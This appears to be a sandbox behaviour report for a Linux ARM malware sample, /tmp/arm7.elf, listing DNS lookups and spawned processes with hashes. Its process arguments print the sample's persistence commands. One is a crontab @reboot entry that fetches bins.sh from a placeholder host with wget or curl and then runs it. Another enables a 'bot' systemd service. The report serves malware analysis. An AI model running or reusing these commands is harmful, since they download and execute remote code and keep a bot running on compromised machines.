Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 20, 2024 01:01:35.904416084 CET | 1.1.1.1 | 192.168.2.15 | 0x255a | No error (0) | 172.111.38.48 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 01:01:40.683821917 CET | 1.1.1.1 | 192.168.2.15 | 0xade8 | No error (0) | 162.213.35.24 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 01:01:40.683821917 CET | 1.1.1.1 | 192.168.2.15 | 0xade8 | No error (0) | 162.213.35.25 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 00:01:30 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | /tmp/arm7.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:31 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:31 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/curl |
Arguments: | /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh |
File size: | 239848 bytes |
MD5 hash: | add6bc2195e82c55985ccf49fd4048e6 |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:34 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /tmp/arm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -c "/bin/systemctl enable bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 00:01:36 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/systemctl |
Arguments: | /bin/systemctl enable bot |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 00:01:37 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 00:01:37 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |